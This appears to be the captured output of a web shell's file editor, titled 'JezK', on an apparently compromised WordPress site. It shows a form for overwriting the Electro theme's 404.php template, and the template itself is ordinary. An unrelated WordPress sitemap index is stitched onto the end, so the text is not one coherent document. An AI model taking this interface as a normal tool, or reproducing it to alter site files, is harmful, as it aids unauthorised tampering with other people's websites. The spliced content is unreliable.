
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: 404.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
/**
 * The template for displaying 404 pages (not found)
 *
 * @package electro
 */

electro_get_header(); ?&gt;

&lt;?php if ( ! function_exists( &#039;elementor_theme_do_location&#039; ) || ! elementor_theme_do_location( &#039;single&#039; ) ) : ?&gt;

&lt;div id=&quot;primary&quot; class=&quot;content-area&quot;&gt;
	&lt;main id=&quot;main&quot; class=&quot;site-main&quot;&gt;
		&lt;div class=&quot;row&quot;&gt;
			&lt;div class=&quot;col-sm-12 center-block&quot;&gt;
				&lt;div class=&quot;info-404&quot;&gt;
					&lt;div class=&quot;text-xs-center text-center inner-bottom-xs pb-5&quot;&gt;
						&lt;h2 class=&quot;display-3&quot;&gt;&lt;?php echo esc_html__( &#039;404!&#039;, &#039;electro&#039; ); ?&gt;&lt;/h2&gt;
						&lt;p class=&quot;lead&quot;&gt;&lt;?php echo esc_html__( &#039;Nothing was found at this location. Try searching, or check out the links below.&#039;, &#039;electro&#039; ); ?&gt;&lt;/p&gt;
						&lt;hr class=&quot;my-4&quot;&gt;
						&lt;div class=&quot;sub-form-row inner-bottom-xs pb-5&quot;&gt;
			            &lt;?php
			                if ( is_woocommerce_activated() ) {
								the_widget( &#039;WC_Widget_Product_Search&#039; );
							} else {
								get_search_form();
							}
						?&gt;
						&lt;/div&gt;
					&lt;/div&gt;
					&lt;div class=&quot;useful-links&quot;&gt;&lt;?php
						if ( is_woocommerce_activated() ) {
							echo &#039;&lt;div class=&quot;row&quot;&gt;&#039;;
								echo &#039;&lt;div class=&quot;col-xs-12 col-sm-8&quot;&gt;&#039;;
									electro_promoted_products(3, 3);
								echo &#039;&lt;/div&gt;&#039;;
								echo &#039;&lt;section class=&quot;col-xs-12 col-sm-4&quot;&gt;&#039;;
								echo &#039;&lt;header&gt;&lt;h2 class=&quot;h1&quot;&gt;&#039; . esc_html__( &#039;Product Categories&#039;, &#039;electro&#039; ) . &#039;&lt;/h2&gt;&lt;/header&gt;&#039;;
								the_widget( &#039;WC_Widget_Product_Categories&#039;, array( &#039;count&#039;	=&gt; 1, &#039;hide_empty&#039; =&gt; true ) );
								echo &#039;&lt;/section&gt;&#039;;
							echo &#039;&lt;/div&gt;&#039;;
							echo &#039;&lt;section&gt;&#039;;
							echo &#039;&lt;header&gt;&lt;h2 class=&quot;h1&quot;&gt;&#039; . esc_html__( &#039;Popular Products&#039;, &#039;electro&#039; ) . &#039;&lt;/h2&gt;&lt;/header&gt;&#039;;
							echo electro_do_shortcode( &#039;best_selling_products&#039;, array( &#039;per_page&#039; =&gt; 4, &#039;columns&#039; =&gt; 4 ) );
							echo &#039;&lt;/section&gt;&#039;;
						}
					?&gt;
					&lt;/div&gt;
				&lt;/div&gt;
			&lt;/div&gt;
		&lt;/div&gt;
	&lt;/main&gt;&lt;!-- #main --&gt;
&lt;/div&gt;&lt;!-- #primary --&gt;

&lt;?php endif; ?&gt;

&lt;?php get_footer();
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
